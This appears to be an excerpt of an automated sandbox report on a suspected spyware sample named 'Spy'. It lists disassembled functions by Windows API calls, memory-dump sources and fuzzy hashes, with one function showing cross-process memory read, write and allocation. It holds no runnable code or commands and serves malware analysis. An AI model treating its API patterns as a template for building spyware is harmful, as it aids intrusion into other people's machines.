                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                      • Instruction ID: fe4d9d52615985c58f5758798b7e7dce99213db2d33d59035ccedc8d42a6b1a1
                                                      • Opcode Fuzzy Hash: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
                                                      • Instruction Fuzzy Hash: DC110476D08748BFC7019FB9AC04ADB7BACAB46324F54425AF814D3390DBB58A408BF0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                      • GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                      • HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                      • Instruction ID: efe9a11bf997c7a3667697ca197377c1f19bf2796b40e7517968755a17df54ad
                                                      • Opcode Fuzzy Hash: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
                                                      • Instruction Fuzzy Hash: A8016D70210204BFDB205FA6DC48DAB7BBDEF89354B50452AF949C3220DE75DC50CA60
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE581B
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE5829
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5831
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE583B
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                      • Instruction ID: 1a40e382d76f2e35e9ed51b8f0c3915b46440a96824200de4e27cfc53be3f335
                                                      • Opcode Fuzzy Hash: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
                                                      • Instruction Fuzzy Hash: FB015731C11A1DABCF10AFFAE9489EDBBB8BB08715F408156E501F3140CF7495A0DBA1
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?,?,00AD8073), ref: 00AD7D45
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D60
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D6E
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?), ref: 00AD7D7E
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AD7C62,80070057,?,?), ref: 00AD7D8A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                      • Instruction ID: 1b6207aaaab4ff5e915aa6ad11ef896abce3eb52c69d9cb3d7f235b65b675086
                                                      • Opcode Fuzzy Hash: eeda93229d452f24f010c9f22bca902e50629a859f8b6ed0a5903bb9de3eeb26
                                                      • Instruction Fuzzy Hash: 0901BC76615219ABCB105F58DC04BAE7BBEEF44352F508025F84AD7210EBB1EE40CBA0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                      • Instruction ID: f6845c93d7972d7bdf2fc598c844a2773ae8458352662076c0a488591aafad42
                                                      • Opcode Fuzzy Hash: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
                                                      • Instruction Fuzzy Hash: CEF0AF34210208BFEB101FA59C8CFA73BADFF49754B508026F945C7290CEA49C80DB60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
                                                      • Instruction ID: db4206b66ccf91c6b42a8bd6e4714224c97250ebdfd3de05708c114b171025f3
                                                      • Opcode Fuzzy Hash: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
                                                      • Instruction Fuzzy Hash: F7F0AF30250204BFEB111FA5EC88FA73BADEF49754F444116F986C7290CFA49E80DB60
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ADCD90
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ADCDA7
                                                      • MessageBeep.USER32(00000000), ref: 00ADCDBF
                                                      • KillTimer.USER32(?,0000040A), ref: 00ADCDDB
                                                      • EndDialog.USER32(?,00000001), ref: 00ADCDF5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                      • Instruction ID: 7cbd0687e916d4092b9e6ea74033ee2909a34e935de60c39ffb6429d138cba55
                                                      • Opcode Fuzzy Hash: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
                                                      • Instruction Fuzzy Hash: 4601A730510709ABEB206B10DD4EB967B79FB00711F40466AB5C3611D1DBF0A994CA90
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00A8179B
                                                      • StrokeAndFillPath.GDI32(?,?,00ABBBC9,00000000,?), ref: 00A817B7
                                                      • SelectObject.GDI32(?,00000000), ref: 00A817CA
                                                      • DeleteObject.GDI32 ref: 00A817DD
                                                      • StrokePath.GDI32(?), ref: 00A817F8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                      • Instruction ID: 564344e1925db18af15cea399264493d2537e59fd244aecee19d7b190273c074
                                                      • Opcode Fuzzy Hash: 0c6747df288172a29c0b41691df3049742d86858d86ead4036302bb83803c3c0
                                                      • Instruction Fuzzy Hash: A4F03C3404820CEBDB11AF2AED4C7983FA8B702322F44C258F42A961F0CF704A96DF50
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00AECA75
                                                      • CoCreateInstance.OLE32(00B13D3C,00000000,00000001,00B13BAC,?), ref: 00AECA8D
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • CoUninitialize.OLE32 ref: 00AECCFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                      • Instruction ID: 49dd0fd7a6dbfe742484379ca4cbb3c5759464f33d9e35b42db2acecfc6179d7
                                                      • Opcode Fuzzy Hash: dd94aac1dab6b39358d6ad443b485445726119e9b2f73e967274b8cd75ef6c24
                                                      • Instruction Fuzzy Hash: 7AA13D71104206AFD700EF64C991EAFB7E8EF98754F40491CF155972A2EB70EE49CB92
                                                      APIs
                                                        • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                        • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00A91680: _memmove.LIBCMT ref: 00A916DB
                                                      • __swprintf.LIBCMT ref: 00A8E598
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A8E431
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 43f2cbd6008fbbc2a59c898e9ef63d5a561d4ad0920127e0e983ffeb07a3f6fa
                                                      • Instruction ID: 37942479711b158f61cb7b12ef755238590351cbb19244e760368446a3b3f0c1
                                                      • Opcode Fuzzy Hash: 43f2cbd6008fbbc2a59c898e9ef63d5a561d4ad0920127e0e983ffeb07a3f6fa
                                                      • Instruction Fuzzy Hash: 24917C71608201AFCB18FF24C995D6EB7F8EF95700F45491DF4869B2A1EB20ED44CB92
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00AA52CD
                                                        • Part of subcall function 00AB0320: __87except.LIBCMT ref: 00AB035B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 2e8a4bed2df2f9bbc34ddc615347beafc9833ae363d21cbb613e62b2564f5614
                                                      • Instruction ID: 4a85bb17f93d5c3c8dfacbb6946367db31a389b70fa773b551c992098251caa5
                                                      • Opcode Fuzzy Hash: 2e8a4bed2df2f9bbc34ddc615347beafc9833ae363d21cbb613e62b2564f5614
                                                      • Instruction Fuzzy Hash: 86515E71E0960197CB116734CA517EB3BE8EB42750F208968E4D14B2E7EF758CC89A5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$+
                                                      • API String ID: 0-2552117581
                                                      • Opcode ID: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                      • Instruction ID: d6bb90b0fbc38e75e00de96e453c6eab70d0257ee7ac2a8ba323710e111e293f
                                                      • Opcode Fuzzy Hash: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                      • Instruction Fuzzy Hash: E851DF759042569FDF259F68C880AFE7BA4EF6A310F544056F892AB3D0D734AC82DB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                      • Instruction ID: cb0ce58888f362a89425ee0c01633b781347693821404ab6d6653ccef62c7558
                                                      • Opcode Fuzzy Hash: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                      • Instruction Fuzzy Hash: 205192B2A007099BDF24CF65C9857AABBF4EF04314F24856EE94BDB291E770D985CB40
                                                      APIs
                                                        • Part of subcall function 00AE1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E4E,?,?,00000034,00000800,?,00000034), ref: 00AE1CE5
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ADA3F7
                                                        • Part of subcall function 00AE1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AE1CB0
                                                        • Part of subcall function 00AE1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00AE1C08
                                                        • Part of subcall function 00AE1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C18
                                                        • Part of subcall function 00AE1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C2E
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA464
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA4B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                      • Instruction ID: 8df46b7d15b8830dafbe9486f39d1890e708497e720f446b51878930710d4d3e
                                                      • Opcode Fuzzy Hash: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                      • Instruction Fuzzy Hash: 1E413CB690122CBFDB10DBA4CD85ADEBBB8EF45300F104095FA55B7280DA706E85CBA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B07A86
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B07A9A
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B07ABE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                      • Instruction ID: 5decc111a196ddda296e25612d6c8070f88a127ceff3e2ecd30e878d77bef3d7
                                                      • Opcode Fuzzy Hash: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                      • Instruction Fuzzy Hash: FF21AD32A50218AFDF218E54CC82FEE7BA9EB48724F114254FE156B1D0DAB1BC508BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B0826F
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B0827D
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B08284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                      • Instruction ID: db76b56287857ada73c0da75d781d06873e8b82a46f8510d3617a88dddb4134a
                                                      • Opcode Fuzzy Hash: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                      • Instruction Fuzzy Hash: C7217AB5604209AFDB10DF58DC85DA73BEDEB5A3A4B140199FA019B3A1CF71ED11CBA0
                                                      APIs
